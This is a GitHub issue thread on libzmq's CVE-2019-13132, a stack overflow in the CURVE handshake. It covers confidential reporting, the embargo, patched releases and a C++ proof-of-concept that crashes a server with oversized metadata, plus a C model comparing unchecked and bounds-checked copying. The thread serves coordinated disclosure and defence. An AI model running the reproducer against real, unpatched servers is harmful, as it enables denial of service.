CVE-2019-13132: denial of service via stack overflow #3558
Comments
|
@fangpenlin we added a policy and contact details at https://github.com/zeromq/libzmq/security/policy |
|
The embargo is now over, here's a coarse description of the problem: A remote, unauthenticated client connecting to a Releases will be out in a few moments. |
|
Closing as it's solved, but feel free to comment with more details. Due to sensitivity the code to reproduce the issue will be published on July 15th at 16:00 UTC. |
|
Published on oss-security: https://www.openwall.com/lists/oss-security/2019/07/08/6 |
|
@myd7349 FYI for vcpkg |
|
homebrew bottles have been updated in Homebrew/homebrew-core#41716 |
|
Thank you! |
|
vcpkg's |
|
Thanks! |
|
Based on the previous discussion, one week has passed, so there should have been enough time for patching; here I am sharing the reproducer:

```cpp
#include <cassert>
#include <string>
#include <unistd.h>
#include <czmq.h>
#include <zmq.h>

int main() {
    zsys_init();

    // Generate CurveZMQ certificates (public/private key pairs actually) for server and client
    zcert_t *serverCert = zcert_new ();
    zcert_t *clientCert = zcert_new ();

    // Setup server socket
    zsock_t* serverSocket = zsock_new(ZMQ_ROUTER);
    // make the server use CURVE secure connection mode
    zsock_set_curve_server(serverSocket, 1);
    // set the server secret key
    zsock_set_curve_secretkey(serverSocket, zcert_secret_txt(serverCert));
    assert(zsock_bind(serverSocket, "tcp://127.0.0.1:7777") != -1);

    // Setup client socket
    zsock_t* clientSocket = zsock_new(ZMQ_DEALER);
    // Set the server public key
    zsock_set_curve_serverkey(clientSocket, zcert_public_txt(serverCert));
    // Set the key pair of the client
    zsock_set_curve_secretkey(clientSocket, zcert_secret_txt(clientCert));
    zsock_set_curve_publickey(clientSocket, zcert_public_txt(clientCert));

    // Set metadata properties on the client socket.
    // This puts a ton of data into the socket metadata, and ZMQ will use it to generate the handshake
    // package for the CurveCP auth schema:
    //
    // https://github.com/zeromq/libzmq/blob/master/src/curve_client.cpp#L182
    //
    // We make the size huge so that it will overflow
    for (size_t i = 0; i < 200; ++i ) {
        std::string property(
            std::string("X-Property") + std::to_string(i) + std::string(":ABCDEFG0123456789")
        );
        assert(zmq_setsockopt (zsock_resolve(clientSocket), ZMQ_METADATA, property.c_str(), property.size()) == 0);
    }

    // This will initiate the connection to the server with our CurveCP auth package and the oversized metadata in it.
    // 1. The server gets the message payload here:
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L274-L275
    //
    // 2. The size `clen` is calculated from the payload size minus the fixed length of the other parts of the payload
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L327
    //
    // 3. The memory for decrypting the crypto box is allocated on the stack with a fixed size
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L329-L331
    //
    // 4. The first overflow: the message data is copied into the fixed stack buffer without a bounds check
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L335-L336
    //
    // 5. The second overflow: the crypto box is decrypted and the oversized result is written into another fixed
    //    stack buffer
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L342-L343
    //
    assert(zsock_connect(clientSocket, "tcp://127.0.0.1:7777") != -1);
    sleep(10);
    zsys_shutdown();
    return 0;
}
```
|
|
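The five numbered steps in the reproducer above describe one bug shape: a length derived purely from the incoming frame size, then used to copy into fixed-size stack buffers with no bound. The C model below is an added illustration of that shape next to the checked form; it is not libzmq's code, and the frame layout (`PREFIX_LEN`, `MAX_BOX_LEN`, the `build_frame` helper) is an assumption chosen for the model. It also computes how large the reproducer's 200 `ZMQ_METADATA` properties become once framed as ZMTP 3.x properties (1-byte name length, name, 4-byte value length, value), which shows why a few hundred bytes of stack are nowhere near enough.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed frame model, not libzmq's actual INITIATE layout:
 * a fixed prefix (command name + nonce) followed by a crypto box that
 * occupies whatever remains of the frame. */
#define PREFIX_LEN  16u   /* assumed: "\x08INITIATE" (9 bytes) + 8-byte nonce, padded */
#define MAX_BOX_LEN 256u  /* assumed: capacity of the fixed stack buffer */

/* Encoded size of one ZMTP 3.x metadata property:
 * 1-byte name length, name, 4-byte value length, value. */
size_t zmtp_property_len(const char *name, const char *value) {
    return 1 + strlen(name) + 4 + strlen(value);
}

/* Total encoded size of the reproducer's properties
 * "X-Property<i>:ABCDEFG0123456789" for i in [0, n). */
size_t reproducer_metadata_len(unsigned n) {
    size_t total = 0;
    char name[32];
    for (unsigned i = 0; i < n; i++) {
        snprintf(name, sizeof name, "X-Property%u", i);
        total += zmtp_property_len(name, "ABCDEFG0123456789");
    }
    return total;
}

/* Constructed frame for the model: prefix followed by box_len filler bytes.
 * The caller frees the result. */
uint8_t *build_frame(size_t box_len, size_t *frame_len) {
    *frame_len = PREFIX_LEN + box_len;
    uint8_t *f = malloc(*frame_len);
    memset(f, 0, PREFIX_LEN);
    memcpy(f, "\x08INITIATE", 9);
    memset(f + PREFIX_LEN, 'A', box_len);
    return f;
}

/* Vulnerable shape (steps 2-4 above): clen comes straight from the frame
 * length and is copied into a fixed stack buffer. Any frame longer than
 * PREFIX_LEN + MAX_BOX_LEN smashes the stack, and a frame shorter than
 * PREFIX_LEN wraps clen to a huge size_t. Only ever called on a benign
 * frame here. Returns the number of box bytes copied. */
int process_initiate_unchecked(const uint8_t *frame, size_t frame_len) {
    uint8_t box[MAX_BOX_LEN];
    size_t clen = frame_len - PREFIX_LEN;   /* attacker-controlled */
    memcpy(box, frame + PREFIX_LEN, clen);  /* no bound on clen */
    return (int)clen;
}

/* Hardened shape: validate the length against the destination before
 * anything is copied. Returns -1 for a short or oversized frame,
 * otherwise the number of box bytes copied. */
int process_initiate_checked(const uint8_t *frame, size_t frame_len) {
    uint8_t box[MAX_BOX_LEN];
    if (frame_len < PREFIX_LEN)             /* rules out the underflow */
        return -1;
    size_t clen = frame_len - PREFIX_LEN;
    if (clen > sizeof box)                  /* rules out the overflow */
        return -1;
    memcpy(box, frame + PREFIX_LEN, clen);
    return (int)clen;
}

int main(void) {
    size_t n;
    uint8_t *benign = build_frame(64, &n);
    printf("benign frame: checked=%d unchecked=%d\n",
           process_initiate_checked(benign, n),
           process_initiate_unchecked(benign, n));
    free(benign);

    size_t meta = reproducer_metadata_len(200);
    uint8_t *huge = build_frame(meta, &n);
    printf("reproducer metadata is %zu bytes; checked=%d\n",
           meta, process_initiate_checked(huge, n));
    free(huge);
    return 0;
}
```

The checked variant refuses the oversized frame with the same error path the server would use for any malformed handshake, so the client gets disconnected instead of writing past the buffer; the unchecked variant is never fed the large frame because doing so is exactly the crash the CVE describes.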
Thank you! Here's another set that separates client and server: |
I found a critical security bug in libzmq and would like to report it confidentially, so that hopefully the bug can be fixed before we disclose it. It appears the only information I can find about reporting security bugs is here in the FAQ:
http://zeromq.org/area:faq#toc9
Besides opening an issue here, do you folks have an email address and a corresponding GPG key I can send the details of this bug to?